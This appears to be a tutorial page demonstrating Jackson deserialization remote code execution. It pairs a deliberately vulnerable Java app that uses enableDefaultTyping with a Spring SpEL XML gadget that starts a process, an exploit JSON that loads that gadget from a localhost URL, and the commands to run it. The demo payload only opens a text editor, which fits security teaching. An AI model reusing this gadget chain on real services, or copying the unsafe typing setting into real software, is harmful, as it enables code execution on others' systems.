Skip to content

Java Deserializer (example 3)

App.java 

package com.michalszalkowski;

import java.nio.file.Files;
import java.nio.file.Paths;
import java.io.IOException;
import com.fasterxml.jackson.databind.ObjectMapper;

public class App {
    public static void main(String[] args) throws IOException {

        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();

        Inner data = mapper.readValue(
                Files.readAllBytes(Paths.get(args[0])),
                Inner.class);

        System.out.println("Data id = " + data.id);
        System.out.println("Data obj = " + data.obj);
    }
}

class Inner {
    public int id;
    public Object obj;
}

spel.xml 

<beans xmlns="http://www.springframework.org/schema/beans"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="
     http://www.springframework.org/schema/beans
     http://www.springframework.org/schema/beans/spring-beans.xsd
">
  <bean id="pb" class="java.lang.ProcessBuilder">
     <constructor-arg value="mousepad" />
     <property name="whatever" value="#{ pb.start() }"/>
  </bean>
</beans>

test-legit.json 

{
    "id": 123,
    "obj": "Lorem Ipsum"
}

test-exploit.json 

{
    "id": 123, 
    "obj": [
        "org.springframework.context.support.FileSystemXmlApplicationContext", 
        "http://127.0.0.1:8080/spel.xml"
    ]
}

run 

mvn clean install

java -jar target/jackson-rce-1.0-jar-with-dependencies.jar test-legit.json
java -jar target/jackson-rce-1.0-jar-with-dependencies.jar test-exploit.json